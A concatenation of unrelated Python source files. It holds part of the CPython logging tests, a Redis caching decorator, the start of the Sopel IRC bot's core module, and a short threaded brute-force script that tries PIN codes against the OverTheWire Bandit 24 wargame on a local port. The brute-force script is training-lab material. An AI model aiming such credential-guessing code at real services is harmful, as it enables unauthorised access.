self.assertEqual(records[-1].funcName, 'inner')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'outer')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'test_find_caller_with_stacklevel')
self.assertGreater(records[-1].lineno, lineno)
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_is_enabled_for_disabled_logger(self):
old_disabled = self.logger.disabled
old_disable = self.logger.manager.disable
self.logger.disabled = True
self.logger.manager.disable = 21
self.addCleanup(setattr, self.logger, 'disabled', old_disabled)
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('root'))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
logger = logging.getLogger(name)
s = pickle.dumps(logger, proto)
unpickled = pickle.loads(s)
self.assertIs(unpickled, logger)
def test_caching(self):
root = self.root_logger
logger1 = logging.getLogger("abc")
logger2 = logging.getLogger("abc.def")
# Set root logger level and ensure cache is empty
root.setLevel(logging.ERROR)
self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
self.assertEqual(logger2._cache, {})
# Ensure cache is populated and calls are consistent
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
self.assertEqual(root._cache, {})
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
# Ensure root cache gets populated
self.assertEqual(root._cache, {})
self.assertTrue(root.isEnabledFor(logging.ERROR))
self.assertEqual(root._cache, {logging.ERROR: True})
# Set parent logger level and ensure caches are emptied
logger1.setLevel(logging.CRITICAL)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
# Ensure logger2 uses parent logger's effective level
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
# Set level to NOTSET and ensure caches are empty
logger2.setLevel(logging.NOTSET)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Verify logger2 follows parent and not root
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger1.isEnabledFor(logging.ERROR))
self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
self.assertTrue(root.isEnabledFor(logging.ERROR))
# Disable logging in manager and ensure caches are clear
logging.disable()
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Ensure no loggers are enabled
self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(root.isEnabledFor(logging.CRITICAL))
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
def test_namer_rotator_inheritance(self):
class HandlerWithNamerAndRotator(logging.handlers.RotatingFileHandler):
def namer(self, name):
return name + ".test"
def rotator(self, source, dest):
if os.path.exists(source):
os.replace(source, dest + ".rotated")
rh = HandlerWithNamerAndRotator(
self.fn, backupCount=2, maxBytes=1)
self.assertEqual(rh.namer(self.fn), self.fn + ".test")
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(rh.namer(self.fn + ".1") + ".rotated")
self.assertFalse(os.path.exists(rh.namer(self.fn + ".1")))
rh.close()
@support.requires_zlib()
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
blacklist = {'logThreads', 'logMultiprocessing',
'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger',
'root', 'threading'}
support.check__all__(self, logging, blacklist=blacklist)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
tests = [
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, IPv6SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest,
MiscTestCase
]
if hasattr(logging.handlers, 'QueueListener'):
tests.append(QueueListenerTest)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
bruteforcer_3000.py
|
#!/bin/python3
#Script to win overthewire bandit 24 challenge
import threading
import socket
from time import sleep
HOST = "127.0.0.1"
PORT = 30002
BUFFERSIZE = 2048
PASS = "" # Input password for user
#Types 0 - Normal, 1 - Warning, 2 - Success
def outputMessage(msg, type):
if (type == 1):
print("[!] " + msg)
elif (type == 2):
print("[*] " + msg)
else:
print("[+] " + msg)
#Brute Force Thread >:3
def bruteForce(startIndex, id):
global HOST, PORT, BUFFERSIZE, PASS
outputMessage("THREAD " + str(id) + " ACTIVE", 0)
threadSocket = socket.socket()
threadSocket.connect((HOST, PORT))
#Allow for inital message fluff
threadSocket.recv(BUFFERSIZE)
for i in range(1000):
PIN = startIndex + i
#outputMessage(str(id) + ":" + str(PIN) , 0)
threadSocket.send((PASS + " " + str(PIN) + "\n").encode())
response = threadSocket.recv(BUFFERSIZE).decode()
if ("Try again." in response):
if ((i % 100) == 0):
outputMessage("Progress: " + str(i), 0)
else:
outputMessage("PIN FOUND :)", 2)
outputMessage(str(PIN), 2)
outputMessage(response, 2)
exit(0)
outputMessage("THREAD " + str(id) + " END", 0)
############
### MAIN ###
############
outputMessage("Starting Bruteforce Software...", 0)
#Spawn Threads
outputMessage("Spawning Threads...", 0)
outputMessage("Happy Hunting :)", 0)
for i in range(10):
thread = threading.Thread(target=bruteForce, args=((i * 1000), i,))
thread.start()
thread.join() #Cry - Bandit doesn't allow multiple threads
|
cache.py
|
# cache.py
# A minimalist caching decorator which json serializes the output of functions
import json
import time
import threading
from functools import wraps
from inspect import getcallargs
class CacheNameClashException(Exception):
pass
# Though it might make sense to look for name clashes on
# per-cache level, it is conceivable that we might call
# create_cache on the same connection twice, so this
# is a better safeguard against bad habits, even though it's global
decorated = {}
def mangle(fname, f, args, kwargs):
# We uniquely identify functions by their list of arguments
# as resolved by the function definition.
print(fname, f, args, kwargs)
print(getcallargs)
print(json.dumps(sorted(getcallargs(f, *args, **kwargs).items(), key=lambda x: x[0])))
return "@" + fname + "_" + json.dumps(getcallargs(f, *args, **kwargs))
def create_cache(cache_store, prefix=""):
"""
Creates a caching decorator that connects to the given Redis client
(or any object similarly supporting get(), set() and lock())
`cache_store` -- An object supporting get(), set(), and lock()
`prefix` -- a prefix to append to the keys of the cache entries for the functions decorated
by the returned decorator. This prevents name clashes between identically-named functions
in the same module
Returns -- cache decorator function
"""
def cache(expires=5, prefix=prefix, bg_caching=False, stale=None):
"""
Decorator for any function which takes json-serializable arguments and returns json-serializable output
which caches the results for the given arguments in the given redis database.
`expires` -- How long to return cached results before calling the underlying function again.
Defaults to 5 seconds, since permanent caching is rarely what is actually desired.
`prefix` -- A prefix appended to the cache keys of the decorated function
`bg_caching` -- Whether to return cached results while results are updated from the underlying function
in a background thread
`stale` -- How long old results can be returned when bg_caching is True, so that two calls don't
try to update the cache in the background. Defaults to 2 * expires
"""
if not stale:
stale = 2 * expires
def decorate(f):
fname = prefix + "_" + f.__module__ + "_" + f.__name__
# Prevent two functions in the same program with the same name from
# accidentally stepping on each others' cache.
if decorated.get(fname):
raise CacheNameClashException("A function with the name " + f.__name__ + " has already been cached elsewhere in this module. Please add a prefix to these functions to uniquely identify them")
decorated[fname] = True
def update_cache(f, lock, *args, **kwargs):
try:
result = f(*args, **kwargs)
cache_store.set(mangle(fname, f, args, kwargs), json.dumps({'timestamp': time.time(), 'result': result}))
return result
finally:
lock.release()
@wraps(f)
def wrapped(*args, **kwargs):
cached_result = cache_store.get(mangle(fname, f, args, kwargs))
try:
cached_result = json.loads(cached_result)
except:
cached_result = {}
now = time.time()
age = now - cached_result.get('timestamp', 0) if cached_result else now
if not cached_result or age > expires:
# Have to use try-finally instead of with, since the implementation of __enter__
# in redis.lock.Lock automatically blocks https://github.com/andymccurdy/redis-py/blob/master/redis/lock.py
# We don't want thread-local storage because we want to release our lock from the
# background thread
lock = cache_store.lock('__lock_' + fname, timeout=expires, blocking_timeout=0.1, thread_local=False)
if lock.acquire():
if bg_caching and cached_result and now - cached_result['timestamp'] < stale:
# Update redis in the bg, and return the already-cached result, if we already have something
# in the cache and it's still valid.
try:
# update_cache releases the lock when it's done
threading.Thread(target=update_cache, args=(f, lock) + args, kwargs=kwargs).start()
except Exception as e:
lock.release()
raise e
else:
# Otherwise update the cache and return the result of the function in this thread
return update_cache(f, lock, *args, **kwargs)
else:
# Can't get the lock, just return the underlying function
if not bg_caching or not cached_result:
return f(*args, **kwargs)
return cached_result['result']
return wrapped
return decorate
return cache
|
bot.py
|
# Copyright 2008, Sean B. Palmer, inamidst.com
# Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
# Copyright 2012-2015, Elsie Powell, http://embolalia.com
# Copyright 2019, Florian Strzelecki <florian.strzelecki@gmail.com>
#
# Licensed under the Eiffel Forum License 2.
from __future__ import generator_stop
from ast import literal_eval
from datetime import datetime
import inspect
import itertools
import logging
import re
import signal
import threading
import time
from typing import Optional
from sopel import irc, logger, plugins, tools
from sopel.db import SopelDB
import sopel.loader
from sopel.plugin import NOLIMIT
from sopel.plugins import jobs as plugin_jobs, rules as plugin_rules
from sopel.tools import deprecated, Identifier
import sopel.tools.jobs
from sopel.trigger import Trigger
__all__ = ['Sopel', 'SopelWrapper']
LOGGER = logging.getLogger(__name__)
QUIT_SIGNALS = [
getattr(signal, name)
for name in ['SIGUSR1', 'SIGTERM', 'SIGINT']
if hasattr(signal, name)
]
RESTART_SIGNALS = [
getattr(signal, name)
for name in ['SIGUSR2', 'SIGILL']
if hasattr(signal, name)
]
SIGNALS = QUIT_SIGNALS + RESTART_SIGNALS
class Sopel(irc.AbstractBot):
def __init__(self, config, daemon=False):
super().__init__(config)
self._daemon = daemon # Used for iPython. TODO something saner here
self.wantsrestart = False
self._running_triggers = []
self._running_triggers_lock = threading.Lock()
self._plugins = {}
self._rules_manager = plugin_rules.Manager()
self._scheduler = plugin_jobs.Scheduler(self)
self._url_callbacks = tools.SopelMemory()
"""Tracking of manually registered URL callbacks.
Should be manipulated only by use of :meth:`register_url_callback` and
:meth:`unregister_url_callback` methods, which are deprecated.
Remove in Sopel 9, along with the above related methods.
"""
self._times = {}
"""
A dictionary mapping lowercased nicks to dictionaries which map
function names to the time which they were last used by that nick.
"""
self.server_capabilities = {}
"""A dict mapping supported IRCv3 capabilities to their options.
For example, if the server specifies the capability ``sasl=EXTERNAL``,
it will be here as ``{"sasl": "EXTERNAL"}``. Capabilities specified
without any options will have ``None`` as the value.
For servers that do not support IRCv3, this will be an empty set.
"""
self.channels = tools.SopelIdentifierMemory()
"""A map of the channels that Sopel is in.
The keys are :class:`sopel.tools.Identifier`\\s of the channel names,
and map to :class:`sopel.tools.target.Channel` objects which contain
the users in the channel and their permissions.
"""
self.users = tools.SopelIdentifierMemory()
"""A map of the users that Sopel is aware of.
The keys are :class:`sopel.tools.Identifier`\\s of the nicknames, and
map to :class:`sopel.tools.target.User` instances. In order for Sopel
to be aware of a user, it must share at least one mutual channel.
"""
self.db = SopelDB(config)
"""The bot's database, as a :class:`sopel.db.SopelDB` instance."""
self.memory = tools.SopelMemory()
"""
A thread-safe dict for storage of runtime data to be shared between
plugins. See :class:`sopel.tools.SopelMemory`.
"""
self.shutdown_methods = []
"""List of methods to call on shutdown."""
@property
def rules(self):
"""Rules manager."""
return self._rules_manager
@property
def scheduler(self):
"""Job Scheduler. See :func:`sopel.plugin.interval`."""
return self._scheduler
@property
def command_groups(self):
"""A mapping of plugin names to lists of their commands.
.. versionchanged:: 7.1
This attribute is now generated on the fly from the registered list
of commands and nickname commands.
"""
# This was supposed to be deprecated, but the built-in help plugin needs it
# TODO: create a new, better, doc interface to remove it
plugin_commands = itertools.chain(
self._rules_manager.get_all_commands(),
self._rules_manager.get_all_nick_commands(),
)
result = {}
for plugin, commands in plugin_commands:
if plugin not in result:
result[plugin] = list(sorted(commands.keys()))
else:
result[plugin].extend(commands.keys())
result[plugin] = list(sorted(result[plugin]))
return result
@property
def doc(self):
"""A dictionary of command names to their documentation.
Each command is mapped to its docstring and any available examples, if
declared in the plugin's code.
.. versionchanged:: 3.2
Use the first item in each callable's commands list as the key,
instead of the function name as declared in the source code.
.. versionchanged:: 7.1
This attribute is now generated on the fly from the registered list
of commands and nickname commands.
"""
# TODO: create a new, better, doc interface to remove it
plugin_commands = itertools.chain(
self._rules_manager.get_all_commands(),
self._rules_manager.get_all_nick_commands(),
)
commands = (
(command, command.get_doc(), command.get_usages())
for plugin, commands in plugin_commands
for command in commands.values()
)
return dict(
(name, (doc.splitlines(), [u['text'] for u in usages]))
for command, doc, usages in commands
for name in ((command.name,) + command.aliases)
)
@property
def hostmask(self) -> Optional[str]:
"""The current hostmask for the bot :class:`~sopel.tools.target.User`.
:return: the bot's current hostmask if the bot is connected and in
a least one channel; ``None`` otherwise
:rtype: Optional[str]
"""
if not self.users or self.nick not in self.users:
# bot must be connected and in at least one channel
return None
return self.users.get(self.nick).hostmask
def has_channel_privilege(self, channel, privilege):
"""Tell if the bot has a ``privilege`` level or above in a ``channel``.
:param str channel: a channel the bot is in
:param int privilege: privilege level to check
:raise ValueError: when the channel is unknown
This method checks the bot's privilege level in a channel, i.e. if it
has this level or higher privileges::
>>> bot.channels['#chan'].privileges[bot.nick] = plugin.OP
>>> bot.has_channel_privilege('#chan', plugin.VOICE)
True
The ``channel`` argument can be either a :class:`str` or a
:class:`sopel.tools.Identifier`, as long as Sopel joined said channel.
If the channel is unknown, a :exc:`ValueError` will be raised.
"""
if channel not in self.channels:
raise ValueError('Unknown channel %s' % channel)
return self.channels[channel].has_privilege(self.nick, privilege)
# signal handlers
def set_signal_handlers(self):
"""Set signal handlers for the bot.
Before running the bot, this method can be called from the main thread
to setup signals. If the bot is connected, upon receiving a signal it
will send a ``QUIT`` message. Otherwise, it raises a
:exc:`KeyboardInterrupt` error.
.. note::
Per the Python documentation of :func:`signal.signal`:
When threads are enabled, this function can only be called from
the main thread; attempting to call it from other threads will
cause a :exc:`ValueError` exception to be raised.
"""
for obj in SIGNALS:
signal.signal(obj, self._signal_handler)
def _signal_handler(self, sig, frame):
if sig in QUIT_SIGNALS:
if self.backend.is_connected():
LOGGER.warning("Got quit signal, sending QUIT to server.")
self.quit('Closing')
else:
self.hasquit = True # mark the bot as "want to quit"
LOGGER.warning("Got quit signal.")
raise KeyboardInterrupt
elif sig in RESTART_SIGNALS:
if self.backend.is_connected():
LOGGER.warning("Got restart signal, sending QUIT to server.")
self.restart('Restarting')
else:
LOGGER.warning("Got restart signal.")
self.wantsrestart = True # mark the bot as "want to restart"
self.hasquit = True # mark the bot as "want to quit"
raise KeyboardInterrupt
# setup
def setup(self):
"""Set up Sopel bot before it can run.
The setup phase is in charge of:
* setting up logging (configure Python's built-in :mod:`logging`)
* setting up the bot's plugins (load, setup, and register)
* starting the job scheduler
"""
self.setup_logging()
self.setup_plugins()
self.post_setup()
def setup_logging(self):
"""Set up logging based on config options."""
logger.setup_logging(self.settings)
base_level = self.settings.core.logging_level or 'INFO'
base_format = self.settings.core.logging_format
base_datefmt = self.settings.core.logging_datefmt
# configure channel logging if required by configuration
if self.settings.core.logging_channel:
channel_level = self.settings.core.logging_channel_level or base_level
channel_format = self.settings.core.logging_channel_format or base_format
channel_datefmt = self.settings.core.logging_channel_datefmt or base_datefmt
channel_params = {}
if channel_format:
channel_params['fmt'] = channel_format
if channel_datefmt:
channel_params['datefmt'] = channel_datefmt
formatter = logger.ChannelOutputFormatter(**channel_params)
handler = logger.IrcLoggingHandler(self, channel_level)
handler.setFormatter(formatter)
# set channel handler to `sopel` logger
LOGGER = logging.getLogger('sopel')
LOGGER.addHandler(handler)
def setup_plugins(self):
"""Load plugins into the bot."""
load_success = 0
load_error = 0
load_disabled = 0
LOGGER.info("Loading plugins...")
usable_plugins = plugins.get_usable_plugins(self.settings)
for name, info in usable_plugins.items():
plugin, is_enabled = info
if not is_enabled:
load_disabled = load_disabled + 1
continue
try:
plugin.load()
except Exception as e:
load_error = load_error + 1
LOGGER.exception("Error loading %s: %s", name, e)
except SystemExit:
load_error = load_error + 1
LOGGER.exception(
"Error loading %s (plugin tried to exit)", name)
else:
try:
if plugin.has_setup():
plugin.setup(self)
plugin.register(self)
except Exception as e:
load_error = load_error + 1
LOGGER.exception("Error in %s setup: %s", name, e)
else:
load_success = load_success + 1
LOGGER.info("Plugin loaded: %s", name)
total = sum([load_success, load_error, load_disabled])
if total and load_success:
LOGGER.info(
"Registered %d plugins, %d failed, %d disabled",
(load_success - 1),
load_error,
load_disabled)
else:
LOGGER.warning("Warning: Couldn't load any plugins")
# post setup
def post_setup(self):
"""Perform post-setup actions.
This method handles everything that should happen after all the plugins
are loaded, and before the bot can connect to the IRC server.
At the moment, this method checks for undefined configuration options,
and starts the job scheduler.
.. versionadded:: 7.1
"""
settings = self.settings
for section_name, section in settings.get_defined_sections():
defined_options = {
settings.parser.optionxform(opt)
for opt, _ in inspect.getmembers(section)
if not opt.startswith('_')
}
for option_name in settings.parser.options(section_name):
if option_name not in defined_options:
LOGGER.warning(
"Config option `%s.%s` is not defined by its section "
"and may not be recognized by Sopel.",
section_name,
option_name,
)
self._scheduler.start()
# plugins management
def reload_plugin(self, name):
"""Reload a plugin.
:param str name: name of the plugin to reload
:raise plugins.exceptions.PluginNotRegistered: when there is no
``name`` plugin registered
This function runs the plugin's shutdown routine and unregisters the
plugin from the bot. Then this function reloads the plugin, runs its
setup routines, and registers it again.
"""
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
plugin = self._plugins[name]
# tear down
plugin.shutdown(self)
plugin.unregister(self)
LOGGER.info("Unloaded plugin %s", name)
# reload & setup
plugin.reload()
plugin.setup(self)
plugin.register(self)
meta = plugin.get_meta_description()
LOGGER.info("Reloaded %s plugin %s from %s",
meta['type'], name, meta['source'])
def reload_plugins(self):
"""Reload all registered plugins.
First, this function runs all plugin shutdown routines and unregisters
all plugins. Then it reloads all plugins, runs their setup routines, and
registers them again.
"""
registered = list(self._plugins.items())
# tear down all plugins
